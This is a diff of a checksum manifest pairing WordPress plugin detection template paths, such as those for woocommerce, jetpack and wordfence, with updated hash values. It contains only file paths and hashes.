+http/technologies/wordpress/plugins/elementskit-lite.yaml:83b08fca676b4b19638b8bd90d3f6b44b06fc836 +http/technologies/wordpress/plugins/enable-media-replace.yaml:25d05b20e5a87f1fdc929395b4039ec28721f6a5 +http/technologies/wordpress/plugins/envato-elements.yaml:2252541af5b3140f045bfad51bf7529f2b64772e +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:d1164dad526b0609096ca3ab93619a44aceb8529 +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:fccb5578f88252fe48bffe978ca1518974c3b57d +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:6bd6c1efa6c28cfefe4a385a2d336744dfbd7dc0 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:c7f263697394aa87fde73fa7568f7bd6b0ff80fd +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:8aeca7b774623e1d98422628dc0bdc0b6da51679 +http/technologies/wordpress/plugins/flamingo.yaml:03eac59e4fc0fc9deef1e9a524dcaec645cd7d1c +http/technologies/wordpress/plugins/fluentform.yaml:2945fa306540aa1aad6eaa2dd104d33ab91e774d +http/technologies/wordpress/plugins/font-awesome.yaml:17608dd8e9a586422debfcbfe46c1bce758f8ecc +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:f56d903290e94e23561be77c0fc8ea0203661206 +http/technologies/wordpress/plugins/formidable.yaml:9dff3687fe2f366720163ab94329d8a0fa4ebc14 +http/technologies/wordpress/plugins/forminator.yaml:8054fbda5de22d134700f54d880f320e06b5c1e9 +http/technologies/wordpress/plugins/ga-google-analytics.yaml:14fef159db7e29bf04a0479d2139d3f5ce38bdf3 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:4498ee441960567ed4c667f183e26c5c5f5a483b +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:4264f07947153c4adb8cf22dd6f7f1f1806b660b +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:28842b945f8e048c0ed74ecf2620d290515dc1db +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:d900c8ef6896587a202699aa0e12368390e28d8f +http/technologies/wordpress/plugins/google-site-kit.yaml:dbcd0ece1d8fad68b5e769e2f1f741cd7d7b2212 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:4ee4cb6d251146c1e138e5c80bdf956ea6e898c7 +http/technologies/wordpress/plugins/gtranslate.yaml:b942a0d6001364fc29ca5d1bdabf75918f29917a +http/technologies/wordpress/plugins/gutenberg.yaml:486526f8c0594abd6c8af2fea208328423178aa7 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:57bdb641220357df4b5e692e20b91a0ecea736d5 http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:a4d739ab05a15c526bd7196e0c28108397f46798 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:0f4e464758736202d4cd5f630e3d6ae78183e63d -http/technologies/wordpress/plugins/header-footer.yaml:92936c6a47ff4726b0a7b97c7ea5686b5a8798cf -http/technologies/wordpress/plugins/health-check.yaml:fcf0c9e7e685f9de5b96cf415282e7985bce1918 -http/technologies/wordpress/plugins/hello-dolly.yaml:ca7e60c9eba41d32c0aa040cec2124ee6d9ecae5 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:a2d3e90e76e99a6926515627ccfe2ba73c09bbe3 -http/technologies/wordpress/plugins/hostinger.yaml:3d1716bd2f46fb046fc487e581e644b972a5f161 -http/technologies/wordpress/plugins/image-optimization.yaml:12b0b8d10e65946e41142eb6a461eb801e925582 -http/technologies/wordpress/plugins/imagify.yaml:f085609c741c54a4bf3511d7bae996cc0d4eecff -http/technologies/wordpress/plugins/imsanity.yaml:913e20f768ce7b09c354531f4cf2bbc7db53093b -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:a36556103402d111ca593a49569521b6bc78a2e5 -http/technologies/wordpress/plugins/instagram-feed.yaml:93fb81f5e22e139fd2c0508740d52e896cf210c1 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:a1363e721f2fe4ce39a3b05309da0f7c5addb465 +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:ab0297b48b038b96d007487449ce480dfd7595b7 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:707f069c2b04e20f7634505d1ea3b65923f47aaa +http/technologies/wordpress/plugins/header-footer.yaml:cec0153ee1d5c2f77f4f082ee4d46355d88c69ac +http/technologies/wordpress/plugins/health-check.yaml:be30929389caf4d72b83dea044928ff698dd4d62 +http/technologies/wordpress/plugins/hello-dolly.yaml:55fe8db4b7e4b3f71441c5e67f622cf16b979e13 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:8abf6156b0619a6a5afcf0ac81d21d75c071aaa3 +http/technologies/wordpress/plugins/hostinger.yaml:2f2ea598019213ca03418f7f1c591c86967ca541 +http/technologies/wordpress/plugins/image-optimization.yaml:17deba3e29c9521906cff94d7d4573876ec43bff +http/technologies/wordpress/plugins/imagify.yaml:8ab46a9375529115c77eb9e3f755edd1bbb76c5a +http/technologies/wordpress/plugins/imsanity.yaml:e92ea9ff4e830e1563f8fe4ea2bf9d45e3f0b95e +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:4929e545de0aeb0247fd96aa732599292c213ccd +http/technologies/wordpress/plugins/instagram-feed.yaml:46464ac3d1266511d5b2bc878e13a9b84297a8ec +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:aa04923ab74fa4285945d6e6adde806a019b854f http/technologies/wordpress/plugins/iwp-client.yaml:211621e7048b766fb8fc89837327329d606f1e50 -http/technologies/wordpress/plugins/jetpack-boost.yaml:7ada0ba0e1402f61160f703940af568bbdc5a78f -http/technologies/wordpress/plugins/jetpack.yaml:052e8123fe19a4ccbd88d7057b6220fc09bc49e5 -http/technologies/wordpress/plugins/kadence-blocks.yaml:462e77eee6dac513bd70e0d905c0430be341fc9a -http/technologies/wordpress/plugins/kirki.yaml:ee663466849a6e4a36b2e70523857761de9e4edc -http/technologies/wordpress/plugins/leadin.yaml:23f08928d76eb48d37b1fd9bbc17c729d533ebfb -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:a7f5642dee515d041e6f09dcd42eead3aed66ba7 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:3f9d5d7dc7e5ceee331b6ae8a8a280dd4937064c -http/technologies/wordpress/plugins/litespeed-cache.yaml:5be7ee817bf0054050bfd6590f987f5e6020acb9 -http/technologies/wordpress/plugins/loco-translate.yaml:3566c32068b67384b7867192b410b9af6fd8f958 -http/technologies/wordpress/plugins/loginizer.yaml:df5aaf6c0fc123cdf155860b02497d948055b5ab +http/technologies/wordpress/plugins/jetpack-boost.yaml:d44cf72e0e6e89409f69a886c9fe2b7369ebe879 +http/technologies/wordpress/plugins/jetpack.yaml:87325eca2f402a828ec4ecd8f4b19b5e0770baf8 +http/technologies/wordpress/plugins/kadence-blocks.yaml:cd642b65c6a1e72ef916bdd972c1196e167e9268 +http/technologies/wordpress/plugins/kirki.yaml:ce7f14157f92af2593e132792e8740bb03c1d937 +http/technologies/wordpress/plugins/leadin.yaml:ea5f40d1e2b0f5d697b0c503c3357a1b42ac6bf8 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:8baad65dbb0d027c0a3c9621577d39230dbb7b6a +http/technologies/wordpress/plugins/limit-login-attempts.yaml:2b14430507446c16aacec19c9c1604df72e21685 +http/technologies/wordpress/plugins/litespeed-cache.yaml:91755ee4041fe0e8c6c6a959646651d963c55c50 +http/technologies/wordpress/plugins/loco-translate.yaml:208875d89562e939146e731af6e3e1dabec13719 +http/technologies/wordpress/plugins/loginizer.yaml:8e789abab5e243d11f19e62e132eaefab330586c http/technologies/wordpress/plugins/loginpress.yaml:f3214f698e4519506749dc1c78c6c6f592d55cd7 -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:772f0c28175630aec6a63eb504d2ea1b74a25dd2 -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:1c05f90eb50f3a8f072925cd0303e84b199e41ec -http/technologies/wordpress/plugins/mailpoet.yaml:76728bbd00bb646eec55a8a5e6c469a30a718300 -http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 -http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 -http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 -http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 -http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 -http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 -http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e -http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 -http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d -http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 -http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 -http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 -http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 -http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 -http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 -http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:d4a9e383f2db2b96cba06d83a42225ca889f255b +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:4b0c0af84e07aae7152cd30edc696747ab4d6fce +http/technologies/wordpress/plugins/mailpoet.yaml:28cb98879dfcb6985f2fcd0221f789b0f7c3e795 +http/technologies/wordpress/plugins/maintenance.yaml:e5af9238ee776c4bed87fb2d286d9af4f5c9e627 +http/technologies/wordpress/plugins/mainwp-child.yaml:1ce9dfd0e8c3a4af9ab6f654a4846976322d771a +http/technologies/wordpress/plugins/malcare-security.yaml:cd888494039c7e94f50e4c63bcac4dc92ea81e02 +http/technologies/wordpress/plugins/megamenu.yaml:b2c98f024aff080f29b32fb035d46fd1b506c313 +http/technologies/wordpress/plugins/members.yaml:41e4c77a90f830af200b3a3169cb76093288f5f0 +http/technologies/wordpress/plugins/meta-box.yaml:933bb1c72ce68017ff397f5254c7e1c5c0c5f105 +http/technologies/wordpress/plugins/metform.yaml:6bece36b72418d79b9d538dcadf0ced96ddaa054 +http/technologies/wordpress/plugins/ml-slider.yaml:0ded626270b030ebaff5ef335c7eb5e151b67736 +http/technologies/wordpress/plugins/newsletter.yaml:cf4154eb87da0efc95adfb9b13a6b298a8a80442 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:21f65d8ac740455bf41fe8e7dd869f61594912d9 +http/technologies/wordpress/plugins/nextgen-gallery.yaml:514494f8380b9e8403dfc9641e4571bd4290c792 +http/technologies/wordpress/plugins/ninja-forms.yaml:4dd238139ae96bd138ba4e5807822ece15a66ab9 +http/technologies/wordpress/plugins/ocean-extra.yaml:25dd41b8eb2b21c6529e0d3e6c733bf187ab4168 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:e98eefebbaa64dd351f1c43f470c0346f91783d5 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:81186fbcb1976c5e3d92af65168292e303cc1e8d +http/technologies/wordpress/plugins/optinmonster.yaml:8b1204e925aeb39486a7388d74b821781134fe86 +http/technologies/wordpress/plugins/otter-blocks.yaml:efbe78c0e91420789651570f3e959de439e88dd2 +http/technologies/wordpress/plugins/password-protected.yaml:387bc2d9f8b8d8d7053a508becb76a647f442c45 +http/technologies/wordpress/plugins/pdf-embedder.yaml:d1bbf01c076a61b10af28868e8a2e955a9f0b354 http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb -http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 -http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:c02c5adab81d81050ce1282a57fa0573a497c356 +http/technologies/wordpress/plugins/pixelyoursite.yaml:9685105dc618f4c032426ef35f6f4bc08d5689ad +http/technologies/wordpress/plugins/polylang.yaml:ae30166d72d45022794cc2e0f8396c74ca192d01 http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 -http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 -http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c -http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc -http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 -http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 -http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d -http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 -http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad -http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 +http/technologies/wordpress/plugins/popup-maker.yaml:75b62ad84680f4fc772c4de57b7fa45c2afc68ad +http/technologies/wordpress/plugins/post-smtp.yaml:59e6b98c1464d44200da97b654e3701bc0f4fa3e +http/technologies/wordpress/plugins/post-types-order.yaml:f865aaa22d7f0ff3a03f8e46ed33c0e510f1e591 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:aebe0dac1f26a231ca75317c3546f49d87e1068c +http/technologies/wordpress/plugins/pretty-link.yaml:20f13e10af569824dbb80f8f2f8c2226a03be2fd +http/technologies/wordpress/plugins/really-simple-captcha.yaml:1691a9379eea745131fdddbdbb19864cd18dbb79 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:f11d4e3e31a4ae76c6cab812ed5fb44ed14c8b8f +http/technologies/wordpress/plugins/redirection.yaml:4ddc667eed98e9ae923da54c11de2bfbaa453233 +http/technologies/wordpress/plugins/redux-framework.yaml:e8c8280bfa21bc2a795fff51c2cc71ec73326f15 +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:f7bada3d6d3ff8c51fb4b76f228774248a855025 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:8fdb8501e2614693fbb66a4702b6df6355772d3f +http/technologies/wordpress/plugins/safe-svg.yaml:3496d3a1392ecfc489b0c8018873d8d87a96b096 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:061b6605dfad00fad9c5d47c5949c5c3e0e944ed +http/technologies/wordpress/plugins/sg-cachepress.yaml:13b7f5d3b4ab98e2aacfeddc48fec64d596f03ca +http/technologies/wordpress/plugins/sg-security.yaml:b305c1529c18dc8b395394cc5c5c57bf475fbfcb +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:a88289c46b295dd3fe2b27f7b8273c533f42069a +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:1f3c33658fae39c741d13970e328b8b4ab4c51d6 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:25f21a882f1454093e284b33514d577a413b3312 +http/technologies/wordpress/plugins/simple-history.yaml:a3cff160a8cd3d4a359afd57610947790e3deb61 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:ebe1032886ba216c9b7b6d7bbccae91353d31179 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:cfe2660830bf44d2ed9ceeb822df6b80a42ef3b9 +http/technologies/wordpress/plugins/smart-slider-3.yaml:a4026002291082ef708d89d4a0f06c989f1e0572 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:3fe3c84cab5872a8e6cd05d4f980e39f2c1a8cec http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e -http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:2b4d2d3c2706a8736bd848f882e18bb587689859 -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:b3c16852e6ce99b39127fbbb91d0c351639199f3 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:1b8a39f280dae43a7b67d73d77d2d2684f2bdcbe +http/technologies/wordpress/plugins/sucuri-scanner.yaml:64ecdf400f2478c5f89478e0a5e800b2679ad8ea +http/technologies/wordpress/plugins/svg-support.yaml:7935857bc3668567fd301224e379012675d57f5d +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:dd7665b5d5809f9a7af20fe8d127f9e65958aff1 +http/technologies/wordpress/plugins/tablepress.yaml:819ba7ff62b37f9554f88a351e73780d64d79d4d +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:adfc102f25196d28ae4c6d62556cc984a8829832 +http/technologies/wordpress/plugins/templately.yaml:60e88028d8fb59c871fb30441f264571ebc92423 +http/technologies/wordpress/plugins/the-events-calendar.yaml:354edf053272f0544de1ca2fe122a23a995b80a1 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:6eecc1bcfe64f290b321c2ed9fe8c002cf1e9710 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:661cafb3ae8ea14d420b77e82599e2464dd38ccd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:da21327ec6e6e3081bcc8c2a407ea35101b7de56 +http/technologies/wordpress/plugins/under-construction-page.yaml:0834f762d5b3698719d4dbddfe9bf037cf4a3e52 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:6bc0b7fd06cc3499e7aaacd57f94dcdd1576ff92 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:140ac6a229ee4985f277c0733ff62e9a36e4781a http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:932c493aa7c4fe437b63b9b9c88caff530bb7ed7 +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:7ea3e3db1bf5da5d2b32a3f5877442357beab3b8 +http/technologies/wordpress/plugins/webp-express.yaml:eb6746917e2352e99af656d86b41da1d24b7b7aa +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:1730b137f5ce0db2c4f4805960b25236dfb9a1c9 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:570a0c9e5c0f6ebc34502bebcb10c3214e71a850 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:9b975daf4e18c87d19be89afa6730f6fa9ba132f +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:9760c10568b4d4fc5c73c1707380fe6da23f0770 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:42448e924ae7ca2d45d14c0fc5a77b0691cae601 +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:d64d6998649463dfa6334ebcc6c80522a52834bc +http/technologies/wordpress/plugins/woocommerce-payments.yaml:cc17c9c93321c5932b12658176c37ccfbcfa35b6 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:6848d082e7b2cb424d5cc9cb4ee62dbc2bc48bd8 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:4f5ffbdc5373b850b2958a7db2f4905f32cda4d8 +http/technologies/wordpress/plugins/woocommerce-services.yaml:463fc3b7b5dbf6be5fb511c471ee175c5e8b91b1 +http/technologies/wordpress/plugins/woocommerce.yaml:4cf20dddbfcccac6d694df339e26f4563a91c830 +http/technologies/wordpress/plugins/wordfence.yaml:b28cbff4aeadada503735ca2c2f86d5121cfb767 +http/technologies/wordpress/plugins/wordpress-importer.yaml:cd3d5aceb37f3191a99a35d2ae5f7675dd89a558 +http/technologies/wordpress/plugins/wordpress-seo.yaml:4ba4b1329172410b1e796bee5c1dd461a93c3589 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:fee2932bc7dc36c05453b0ebe79afdcc0fb182f5 +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:de42682d38cd6e69a5926e379166f8b4549cbaa0 +http/technologies/wordpress/plugins/wp-file-manager.yaml:244d1c59efee06bea06948e11da837e29b0f437c +http/technologies/wordpress/plugins/wp-google-maps.yaml:c1aeb9300ed8869add73f461454b3ba0f8aa36fb +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:d94fa609b57d7866e751f47619d309a1fab6bc7a +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:07f3f3f93c2f0dd3ef8b4ebc65aac12e2bf3c559 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:b955b8b715fc18cc83033f2d7b01e61b9ff63e5c +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:f498a0eb605778f62ad630419a4c46f3622c98fe 